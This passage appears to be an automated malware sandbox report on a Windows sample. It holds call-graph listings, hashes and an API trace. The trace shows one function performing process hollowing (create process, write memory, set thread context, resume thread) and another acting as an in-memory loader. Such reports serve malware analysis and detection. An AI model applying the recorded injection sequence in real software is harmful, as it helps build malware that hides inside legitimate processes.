16715 6e3ae6 16713->16715 16717 6e3543 16714->16717 16756 6e6b6e EnterCriticalSection 16714->16756 16751 6ec9b3 16715->16751 16719 6e173a 16717->16719 16720 6e176a 16719->16720 16721 6e1746 16719->16721 16720->16694 16722 6e3ad7 std::_Lockit::_Lockit 7 API calls 16721->16722 16723 6e1750 16722->16723 16724 6e3b2f std::_Lockit::~_Lockit 2 API calls 16723->16724 16724->16720 16726 6e19f3 16725->16726 16727 6e19b6 16725->16727 16726->16699 16726->16700 16727->16726 16728 6e7031 codecvt 45 API calls 16727->16728 16729 6e19c3 codecvt 16728->16729 16808 6e1665 16729->16808 16736 6e7031 codecvt 45 API calls 16735->16736 16737 6e51c5 16736->16737 16737->16703 16739 6e3b39 16738->16739 16740 6ec9c1 16738->16740 16741 6e3b4c 16739->16741 16990 6e6b7c LeaveCriticalSection 16739->16990 16991 6ec99c LeaveCriticalSection 16740->16991 16741->16697 16744 6ec9c8 16744->16697 16746 6e161e Concurrency::cancel_current_task 16745->16746 16747 6e8413 CallUnexpected RaiseException 16746->16747 16748 6e162c 16747->16748 16749 6e1235 Concurrency::cancel_current_task 44 API calls 16748->16749 16757 6f2d86 16751->16757 16756->16717 16778 6f268c 16757->16778 16779 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 16778->16779 16780 6f26a2 16779->16780 16781 6f26a6 16780->16781 16782 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 16781->16782 16783 6f26bc 16782->16783 16784 6f26c0 16783->16784 16785 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 16784->16785 16786 6f26d6 16785->16786 16787 6f26da 16786->16787 16788 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 16787->16788 16809 6e3ad7 std::_Lockit::_Lockit 7 API calls 16808->16809 16810 6e1671 16809->16810 16811 6e169f 16810->16811 16812 6e16b2 16810->16812 16990->16741 16991->16744 16993 6e314d __EH_prolog3_catch 16992->16993 16994 6e315f 16993->16994 16997 6e317e 16993->16997 16995 6e1caf std::ios_base::_Init 45 API calls 16994->16995 17000 6e3177 codecvt 16995->17000 16996 6e318a 16999 6e262c 69 API calls 16996->16999 16996->17000 16997->16996 16998 6e2e67 45 API calls 16997->16998 16998->16996 17001 6e31b7 std::ios_base::_Ios_base_dtor 16999->17001 17000->16586 17001->17000 17002 6e1caf std::ios_base::_Init 45 API calls 17001->17002 17002->17000 17073 6e3b72 __EH_prolog3_GS 17072->17073 17074 6e2493 std::_Throw_Cpp_error 45 API calls 17073->17074 17075 6e3b86 17074->17075 17076 6e147d std::_Throw_Cpp_error 45 API calls 17075->17076 17077 6e3b9b 17076->17077 17078 6e2520 std::_Throw_Cpp_error 44 API calls 17077->17078 17079 6e3ba3 17078->17079 17082 6e7548 17079->17082 17083 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17082->17083 17084 6e7552 17083->17084 17084->17084 17086 6eff74 17085->17086 17087 6eff62 17085->17087 17097 6efdfd 17086->17097 17112 6efffd GetModuleHandleW 17087->17112 17092 6e72d0 17092->16039 17098 6efe09 __FrameHandler3::FrameUnwindToState 17097->17098 17120 6ec954 EnterCriticalSection 17098->17120 17100 6efe13 17121 6efe4a 17100->17121 17102 6efe20 17125 6efe3e 17102->17125 17105 6effcc 17150 6f0040 17105->17150 17108 6effea 17110 6f0062 __InternalCxxFrameHandler 3 API calls 17108->17110 17109 6effda GetCurrentProcess TerminateProcess 17109->17108 17111 6efff2 ExitProcess 17110->17111 17113 6eff67 17112->17113 17113->17086 17114 6f0062 GetModuleHandleExW 17113->17114 17115 6f00c2 17114->17115 17116 6f00a1 GetProcAddress 17114->17116 17118 6f00c8 FreeLibrary 17115->17118 17119 6eff73 17115->17119 17116->17115 17117 6f00b5 17116->17117 17117->17115 17118->17119 17119->17086 17120->17100 17122 6efe56 __FrameHandler3::FrameUnwindToState 17121->17122 17123 6efebd __InternalCxxFrameHandler 17122->17123 17128 6f1bcf 17122->17128 17123->17102 17149 6ec99c LeaveCriticalSection 17125->17149 17127 6efe2c 17127->17092 17127->17105 17129 6f1bdb __EH_prolog3 17128->17129 17132 6f1927 17129->17132 17131 6f1c02 codecvt 17131->17123 17133 6f1933 __FrameHandler3::FrameUnwindToState 17132->17133 17140 6ec954 EnterCriticalSection 17133->17140 17135 6f1941 17141 6f1adf 17135->17141 17140->17135 17142 6f1afe 17141->17142 17143 6f194e 17141->17143 17142->17143 17144 6f1f6f ___free_lconv_mon 14 API calls 17142->17144 17145 6f1976 17143->17145 17144->17143 17148 6ec99c LeaveCriticalSection 17145->17148 17147 6f195f 17147->17131 17148->17147 17149->17127 17155 6f2e4b GetPEB 17150->17155 17153 6effd6 17153->17108 17153->17109 17154 6f004a GetPEB 17154->17153 17156 6f2e65 17155->17156 17157 6f0045 17155->17157 17159 6f28f8 17156->17159 17157->17153 17157->17154 17160 6f2875 __FrameHandler3::FrameUnwindToState 5 API calls 17159->17160 17161 6f2914 17160->17161 17161->17157 15167 2cd018d 15168 2cd01c5 15167->15168 15168->15168 15169 2cd02d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 15168->15169 15174 2cd0392 TerminateProcess 15168->15174 15169->15168 15170 2cd03a2 WriteProcessMemory 15169->15170 15171 2cd03e7 15170->15171 15172 2cd03ec WriteProcessMemory 15171->15172 15173 2cd0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 15171->15173 15172->15171 15174->15169 20694 6e470c 20697 6e472f 20694->20697 20702 6e4728 20694->20702 20695 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20696 6e4812 20695->20696 20699 6e47d5 20697->20699 20700 6e4778 20697->20700 20697->20702 20701 6edcd3 72 API calls 20699->20701 20699->20702 20700->20702 20703 6e3e17 20700->20703 20701->20702 20702->20695 20706 6ed366 20703->20706 20707 6ed379 _Fputc 20706->20707 20712 6ed20c 20707->20712 20709 6ed388 20710 6ec320 _Fputc 44 API calls 20709->20710 20711 6e3e27 20710->20711 20711->20702 20713 6ed218 __FrameHandler3::FrameUnwindToState 20712->20713 20714 6ed245 20713->20714 20715 6ed221 20713->20715 20726 6ecb78 EnterCriticalSection 20714->20726 20716 6ec785 __strnicoll 44 API calls 20715->20716 20725 6ed23a _Fputc 20716->20725 20718 6ed24e 20719 6ed2f9 _Fputc 20718->20719 20720 6f364f _Ungetc 44 API calls 20718->20720 20727 6ed331 20719->20727 20722 6ed267 20720->20722 20722->20719 20723 6ed2c8 20722->20723 20724 6ec785 __strnicoll 44 API calls 20723->20724 20724->20725 20725->20709 20726->20718 20730 6ecb8c LeaveCriticalSection 20727->20730 20729 6ed337 20729->20725 20730->20729 18855 6f4dfa 18856 6f364f _Ungetc 44 API calls 18855->18856 18857 6f4e07 18856->18857 18858 6f4e13 18857->18858 18859 6f4e5f 18857->18859 18867 6f5190 18857->18867 18859->18858 18861 6f4ec1 18859->18861 18863 6f5e09 44 API calls 18859->18863 18875 6f4fea 18861->18875 18865 6f4eb4 18863->18865 18865->18861 18866 6f5f2e _Ungetc 14 API calls 18865->18866 18866->18861 18868 6f51aa 18867->18868 18869 6f51a6 18867->18869 18870 6f94a1 __fread_nolock 44 API calls 18868->18870 18874 6f51f9 18868->18874 18869->18859 18871 6f51cb 18870->18871 18872 6f51d3 SetFilePointerEx 18871->18872 18871->18874 18873 6f51ea GetFileSizeEx 18872->18873 18872->18874 18873->18874 18874->18859 18876 6f364f _Ungetc 44 API calls 18875->18876 18877 6f4ff9 18876->18877 18878 6f509f 18877->18878 18879 6f500c 18877->18879 18880 6f4152 ___scrt_uninitialize_crt 69 API calls 18878->18880 18881 6f5029 18879->18881 18884 6f5050 18879->18884 18883 6f4ed2 18880->18883 18882 6f4152 ___scrt_uninitialize_crt 69 API calls 18881->18882 18882->18883 18884->18883 18886 6f5d4d 18884->18886 18887 6f5d61 _Fputc 18886->18887 18892 6f5ba4 18887->18892 18890 6ec320 _Fputc 44 API calls 18891 6f5d85 18890->18891 18891->18883 18895 6f5bb0 __FrameHandler3::FrameUnwindToState 18892->18895 18893 6f5bb8 18893->18890 18894 6f5c8e 18896 6ec785 __strnicoll 44 API calls 18894->18896 18895->18893 18895->18894 18897 6f5c0c 18895->18897 18896->18893 18903 6f93ca EnterCriticalSection 18897->18903 18899 6f5c12 18900 6f5c37 18899->18900 18901 6f5cca __fread_nolock 46 API calls 18899->18901 18904 6f5c86 18900->18904 18901->18900 18903->18899 18907 6f93ed LeaveCriticalSection 18904->18907 18906 6f5c8c 18906->18893 18907->18906 18914 6f35c3 18915 6f35cf __FrameHandler3::FrameUnwindToState 18914->18915 18926 6ec954 EnterCriticalSection 18915->18926 18917 6f35d6 18927 6f932c 18917->18927 18924 6f3513 2 API calls 18925 6f35f4 18924->18925 18946 6f361a 18925->18946 18926->18917 18928 6f9338 __FrameHandler3::FrameUnwindToState 18927->18928 18929 6f9362 18928->18929 18930 6f9341 18928->18930 18949 6ec954 EnterCriticalSection 18929->18949 18931 6ec900 __strnicoll 14 API calls 18930->18931 18933 6f9346 18931->18933 18934 6ec802 __strnicoll 44 API calls 18933->18934 18935 6f35e5 18934->18935 18935->18925 18940 6f345d GetStartupInfoW 18935->18940 18936 6f939a 18957 6f93c1 18936->18957 18937 6f936e 18937->18936 18950 6f927c 18937->18950 18941 6f347a 18940->18941 18942 6f350e 18940->18942 18941->18942 18943 6f932c 44 API calls 18941->18943 18942->18924 18944 6f34a2 18943->18944 18944->18942 18945 6f34d2 GetFileType 18944->18945 18945->18944 18961 6ec99c LeaveCriticalSection 18946->18961 18948 6f3605 18949->18937 18951 6f1f12 __InternalCxxFrameHandler 14 API calls 18950->18951 18954 6f928e 18951->18954 18952 6f929b 18953 6f1f6f ___free_lconv_mon 14 API calls 18952->18953 18955 6f92f0 18953->18955 18954->18952 18956 6f2bc2 __FrameHandler3::FrameUnwindToState 6 API calls 18954->18956 18955->18937 18956->18954 18960 6ec99c LeaveCriticalSection 18957->18960 18959 6f93c8 18959->18935 18960->18959 18961->18948 19436 6e5daf 19437 6e5dda 19436->19437 19442 6e5dd1 19436->19442 19439 6e5e1a 19437->19439 19437->19442 19444 6e5e40 19437->19444 19438 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19440 6e5e3c 19438->19440 19448 6e5526 19439->19448 19442->19438 19443 6e5e9b 19443->19442 19446 6edcd3 72 API calls 19443->19446 19444->19443 19445 6e5e7c 19444->19445 19445->19442 19447 6e5526 _Fputc 48 API calls 19445->19447 19446->19442 19447->19442 19451 6ee6f2 19448->19451 19452 6ee705 _Fputc 19451->19452 19457 6ee4f6 19452->19457 19455 6ec320 _Fputc 44 API calls 19456 6e5534 19455->19456 19456->19442 19458 6ee502 __FrameHandler3::FrameUnwindToState 19457->19458 19459 6ee52e 19458->19459 19460 6ee509 19458->19460 19468 6ecb78 EnterCriticalSection 19459->19468 19461 6ec785 __strnicoll 44 API calls 19460->19461 19464 6ee524 19461->19464 19463 6ee53d 19469 6ee5ba 19463->19469 19464->19455 19468->19463 19470 6ee5f1 19469->19470 19489 6ee5df _Fputc 19469->19489 19471 6f364f _Ungetc 44 API calls 19470->19471 19472 6ee5f8 19471->19472 19473 6f364f _Ungetc 44 API calls 19472->19473 19477 6ee620 19472->19477 19475 6ee609 19473->19475 19474 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19476 6ee54e 19474->19476 19475->19477 19479 6f364f _Ungetc 44 API calls 19475->19479 19491 6ee57e 19476->19491 19478 6f364f _Ungetc 44 API calls 19477->19478 19477->19489 19480 6ee653 19478->19480 19481 6ee615 19479->19481 19482 6ee676 19480->19482 19484 6f364f _Ungetc 44 API calls 19480->19484 19483 6f364f _Ungetc 44 API calls 19481->19483 19486 6f67ed _Fputc 46 API calls 19482->19486 19482->19489 19483->19477 19485 6ee65f 19484->19485 19485->19482 19487 6f364f _Ungetc 44 API calls 19485->19487 19486->19489 19488 6ee66b 19487->19488 19490 6f364f _Ungetc 44 API calls 19488->19490 19489->19474 19490->19482 19494 6ecb8c LeaveCriticalSection 19491->19494 19493 6ee584 19493->19464 19494->19493 19666 6ed1b1 19667 6ed1bc 19666->19667 19668 6ed1d1 19666->19668 19669 6ec900 __strnicoll 14 API calls 19667->19669 19670 6ed1ee 19668->19670 19671 6ed1d9 19668->19671 19673 6ed1c1 19669->19673 19680 6f4db9 19670->19680 19674 6ec900 __strnicoll 14 API calls 19671->19674 19675 6ec802 __strnicoll 44 API calls 19673->19675 19676 6ed1de 19674->19676 19679 6ed1cc 19675->19679 19677 6ec802 __strnicoll 44 API calls 19676->19677 19678 6ed1e9 19677->19678 19681 6f4dcd _Fputc 19680->19681 19686 6f47ce 19681->19686 19684 6ec320 _Fputc 44 API calls 19685 6f4de7 19684->19685 19685->19678 19687 6f47da __FrameHandler3::FrameUnwindToState 19686->19687 19688 6f4804 19687->19688 19689 6f47e1 19687->19689 19697 6ecb78 EnterCriticalSection 19688->19697 19690 6ec785 __strnicoll 44 API calls 19689->19690 19692 6f47fa 19690->19692 19692->19684 19693 6f4812 19698 6f485d 19693->19698 19695 6f4821 19711 6f4853 19695->19711 19697->19693 19699 6f486c 19698->19699 19700 6f4894 19698->19700 19702 6ec785 __strnicoll 44 API calls 19699->19702 19701 6f364f _Ungetc 44 API calls 19700->19701 19703 6f489d 19701->19703 19708 6f4887 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19702->19708 19714 6f5d8d 19703->19714 19706 6f4947 19717 6f4bbd 19706->19717 19708->19695 19709 6f495e 19709->19708 19729 6f49fe 19709->19729 19736 6ecb8c LeaveCriticalSection 19711->19736 19713 6f485b 19713->19692 19715 6f5ba4 48 API calls 19714->19715 19716 6f48bb 19715->19716 19716->19706 19716->19708 19716->19709 19718 6f4bcc ___scrt_uninitialize_crt 19717->19718 19719 6f364f _Ungetc 44 API calls 19718->19719 19720 6f4be8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19719->19720 19722 6f5d8d 48 API calls 19720->19722 19728 6f4bf4 19720->19728 19721 6e701e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19723 6f4d66 19721->19723 19724 6f4c48 19722->19724 19723->19708 19725 6f4c7a ReadFile 19724->19725 19724->19728 19726 6f4ca1 19725->19726 19725->19728 19727 6f5d8d 48 API calls 19726->19727 19727->19728 19728->19721 19730 6f364f _Ungetc 44 API calls 19729->19730 19731 6f4a11 19730->19731 19732 6f5d8d 48 API calls 19731->19732 19734 6f4a59 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19731->19734 19733 6f4aac 19732->19733 19733->19734 19735 6f5d8d 48 API calls 19733->19735 19734->19708 19735->19734 19736->19713 19737 6f21b0 19738 6f21cb 19737->19738 19739 6f21bb 19737->19739 19743 6f21d1 19739->19743 19742 6f1f6f ___free_lconv_mon 14 API calls 19742->19738 19744 6f21e6 19743->19744 19745 6f21ec 19743->19745 19747 6f1f6f ___free_lconv_mon 14 API calls 19744->19747 19746 6f1f6f ___free_lconv_mon 14 API calls 19745->19746 19748 6f21f8 19746->19748 19747->19745 19749 6f1f6f ___free_lconv_mon 14 API calls 19748->19749 19750 6f2203 19749->19750 19751 6f1f6f ___free_lconv_mon 14 API calls 19750->19751 19752 6f220e 19751->19752 19753 6f1f6f ___free_lconv_mon 14 API calls 19752->19753 19754 6f2219 19753->19754 19755 6f1f6f ___free_lconv_mon 14 API calls 19754->19755 19756 6f2224 19755->19756 19757 6f1f6f ___free_lconv_mon 14 API calls 19756->19757 19758 6f222f 19757->19758 19759 6f1f6f ___free_lconv_mon 14 API calls 19758->19759 19760 6f223a 19759->19760 19761 6f1f6f ___free_lconv_mon 14 API calls 19760->19761 19762 6f2245 19761->19762 19763 6f1f6f ___free_lconv_mon 14 API calls 19762->19763 19764 6f2253 19763->19764 19769 6f1ffd 19764->19769 19770 6f2009 __FrameHandler3::FrameUnwindToState 19769->19770 19785 6ec954 EnterCriticalSection 19770->19785 19772 6f2013 19775 6f1f6f ___free_lconv_mon 14 API calls 19772->19775 19776 6f203d 19772->19776 19775->19776 19786 6f205c 19776->19786 19777 6f2068 19778 6f2074 __FrameHandler3::FrameUnwindToState 19777->19778 19790 6ec954 EnterCriticalSection 19778->19790 19780 6f207e 19791 6f229e 19780->19791 19782 6f2091 19795 6f20b1 19782->19795 19785->19772 19789 6ec99c LeaveCriticalSection 19786->19789 19788 6f204a 19788->19777 19789->19788 19790->19780 19792 6f22ad __Getctype 19791->19792 19794 6f22d4 __Getctype 19791->19794 19793 6fa26b __Getctype 14 API calls 19792->19793 19792->19794 19793->19794 19794->19782 19798 6ec99c LeaveCriticalSection 19795->19798 19797 6f209f 19797->19742 19798->19797 19821 6f058b 19824 6f0257 19821->19824 19825 6f0263 __FrameHandler3::FrameUnwindToState 19824->19825 19832 6ec954 EnterCriticalSection 19825->19832 19827 6f026d 19828 6f029b 19827->19828 19830 6fa538 __Getctype 14 API calls 19827->19830 19833 6f02b9 19828->19833 19830->19827 19832->19827 19836 6ec99c LeaveCriticalSection 19833->19836 19835 6f02a7 19836->19835 19840 6ed580 19843 6ed59d 19840->19843 19845 6ed5a9 __FrameHandler3::FrameUnwindToState 19843->19845 19844 6ed598 19845->19844 19846 6ed5bc __fread_nolock 19845->19846 19847 6ed5f3 19845->19847 19850 6ec900 __strnicoll 14 API calls 19846->19850 19856 6ecb78 EnterCriticalSection 19847->19856 19849 6ed5fd 19857 6ed39a 19849->19857 19852 6ed5d6 19850->19852 19854 6ec802 __strnicoll 44 API calls 19852->19854 19854->19844 19856->19849 19858 6ed3ab __fread_nolock 19857->19858 19869 6ed3c7 19857->19869 19859 6ed3b7 19858->19859 19863 6ed409 __fread_nolock 19858->19863 19858->19869 19860 6ec900 __strnicoll 14 API calls 19859->19860 19861 6ed3bc 19860->19861 19862 6ec802 __strnicoll 44 API calls 19861->19862 19862->19869 19864 6ed530 __fread_nolock 19863->19864 19865 6f364f _Ungetc 44 API calls 19863->19865 19866 6ed63a __fread_nolock 44 API calls 19863->19866 19868 6f5805 __fread_nolock 56 API calls 19863->19868 19863->19869 19867 6ec900 __strnicoll 14 API calls 19864->19867 19865->19863 19866->19863 19867->19861 19868->19863 19870 6ed632 19869->19870 19873 6ecb8c LeaveCriticalSection 19870->19873 19872 6ed638 19872->19844 19873->19872

                                                                                    Executed Functions

                                                                                    Function 02CD018D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02CD02FC
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02CD030F
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02CD032D
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CD0351
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02CD037C
                                                                                    • TerminateProcess.KERNELBASE(?,00000000), ref: 02CD039B
                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02CD03D4
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02CD041F
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CD045D
                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 02CD0499
                                                                                    • ResumeThread.KERNELBASE(?), ref: 02CD04A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1590000008.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2cd0000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                    • String ID: GetP$Load$aryA$ress
                                                                                    • API String ID: 2440066154-977067982
                                                                                    • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction ID: b5451e71f7702291b1172a6c7d96f1d144bde60052cc35317a0d7a6ee67fb83b
                                                                                    • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction Fuzzy Hash: 06B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94
                                                                                    Function 006E22BA Relevance: 9.1, APIs: 6, Instructions: 128threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • FreeConsole.KERNELBASE ref: 006E2303
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 006E2313
                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 006E241E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleCpp_errorCurrentFreeThreadThrow_std::_
                                                                                    • String ID:
                                                                                    • API String ID: 1679527187-0
                                                                                    • Opcode ID: ed77de1eb44fe322a5fe8b2e74c1133f56c3a282f1a3db86a999c0fb96a72b49
                                                                                    • Instruction ID: 0dd0707f57b667796694686b803073a6200886b3db127f6bdf9b9719bd99e688
                                                                                    • Opcode Fuzzy Hash: ed77de1eb44fe322a5fe8b2e74c1133f56c3a282f1a3db86a999c0fb96a72b49
                                                                                    • Instruction Fuzzy Hash: 7A41B0B1509382AFD300DF26DC91A5FB7EFEB88300F00492EF19496181EB74C9488B97
                                                                                    Function 006F2E07 Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 47a218d386442900e253073fa0c05f2342f381bffaba30786822a93b33d438cc
                                                                                    • Instruction ID: 5dc71746e08e257a5260dd158b447e4ec1272d7c708de5972d566ee3c8b01dbc
                                                                                    • Opcode Fuzzy Hash: 47a218d386442900e253073fa0c05f2342f381bffaba30786822a93b33d438cc
                                                                                    • Instruction Fuzzy Hash: D7F06532611328DBCB16C78CC456BA973ADFB45B51F214056F601D7251C2B4DD00CBC4
                                                                                    Function 006E21EF Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 70librarymemoryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualProtect,?,0000000006:1@0000000005:@), ref: 006E223C
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 006E2243
                                                                                    • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 006E2259
                                                                                    • FreeConsole.KERNEL32 ref: 006E2261
                                                                                      • Part of subcall function 006E1D3C: _Deallocate.LIBCONCRT ref: 006E1DD3
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000188,0070AAC0,00000000,00000000), ref: 006E2290
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 006E2299
                                                                                      • Part of subcall function 006E2520: _Deallocate.LIBCONCRT ref: 006E252F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Deallocate$AddressAllocConsoleCreateFreeHandleModuleObjectProcSingleThreadVirtualWait
                                                                                    • String ID: 0000000006:1@0000000005:@$VirtualProtect$kernel32.dll
                                                                                    • API String ID: 2719435794-2246029265
                                                                                    • Opcode ID: bc34a675985294e897b1a14b54d4790ff329292851a3ca08830b56c448a0b463
                                                                                    • Instruction ID: 8cbf63f863f99ed944810893150b2c3c47eb686792cc51feea2516f0c577c7a2
                                                                                    • Opcode Fuzzy Hash: bc34a675985294e897b1a14b54d4790ff329292851a3ca08830b56c448a0b463
                                                                                    • Instruction Fuzzy Hash: A911C4B2609344FAE254BB71EC4BF6B37ADDB84730F10871DF105861D2ED78A94486A9
                                                                                    Function 006F5805 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 41 6f5805-6f5815 42 6f582f-6f5831 41->42 43 6f5817-6f582a call 6ec8ed call 6ec900 41->43 44 6f5837-6f583d 42->44 45 6f5b85-6f5b92 call 6ec8ed call 6ec900 42->45 61 6f5b9d 43->61 44->45 47 6f5843-6f586f 44->47 62 6f5b98 call 6ec802 45->62 47->45 51 6f5875-6f587e 47->51 54 6f5898-6f589a 51->54 55 6f5880-6f5893 call 6ec8ed call 6ec900 51->55 59 6f5b81-6f5b83 54->59 60 6f58a0-6f58a4 54->60 55->62 64 6f5ba0-6f5ba3 59->64 60->59 65 6f58aa-6f58ae 60->65 61->64 62->61 65->55 68 6f58b0-6f58c7 65->68 70 6f590c-6f5912 68->70 71 6f58c9-6f58cc 68->71 72 6f5914-6f591b 70->72 73 6f58e3-6f58fa call 6ec8ed call 6ec900 call 6ec802 70->73 74 6f58ce-6f58d6 71->74 75 6f58db-6f58e1 71->75 77 6f591f-6f593d call 6f5f8a call 6f1f6f * 2 72->77 78 6f591d 72->78 106 6f5ab8 73->106 79 6f598c-6f599f 74->79 75->73 80 6f58ff-6f590a 75->80 111 6f593f-6f5955 call 6ec900 call 6ec8ed 77->111 112 6f595a-6f5982 call 6f5dab 77->112 78->77 84 6f5a5b-6f5a64 call 6fbe7c 79->84 85 6f59a5-6f59b1 79->85 82 6f5989 80->82 82->79 95 6f5a66-6f5a78 84->95 96 6f5ad5 84->96 85->84 89 6f59b7-6f59b9 85->89 89->84 93 6f59bf-6f59e0 89->93 93->84 98 6f59e2-6f59f8 93->98 95->96 101 6f5a7a-6f5a89 GetConsoleMode 95->101 100 6f5ad9-6f5aef ReadFile 96->100 98->84 103 6f59fa-6f59fc 98->103 107 6f5b4d-6f5b58 GetLastError 100->107 108 6f5af1-6f5af7 100->108 101->96 109 6f5a8b-6f5a8f 101->109 103->84 105 6f59fe-6f5a21 103->105 105->84 113 6f5a23-6f5a39 105->113 110 6f5abb-6f5ac5 call 6f1f6f 106->110 114 6f5b5a-6f5b6c call 6ec900 call 6ec8ed 107->114 115 6f5b71-6f5b74 107->115 108->107 116 6f5af9 108->116 109->100 117 6f5a91-6f5aa9 ReadConsoleW 109->117 110->64 111->106 112->82 113->84 120 6f5a3b-6f5a3d 113->120 114->106 126 6f5b7a-6f5b7c 115->126 127 6f5ab1-6f5ab7 call 6ec8a6 115->127 123 6f5afc-6f5b0e 116->123 124 6f5aab GetLastError 117->124 125 6f5aca-6f5ad3 117->125 120->84 130 6f5a3f-6f5a56 120->130 123->110 133 6f5b10-6f5b14 123->133 124->127 125->123 126->110 127->106 130->84 137 6f5b2d-6f5b3a 133->137 138 6f5b16-6f5b26 call 6f551f 133->138 143 6f5b3c call 6f5676 137->143 144 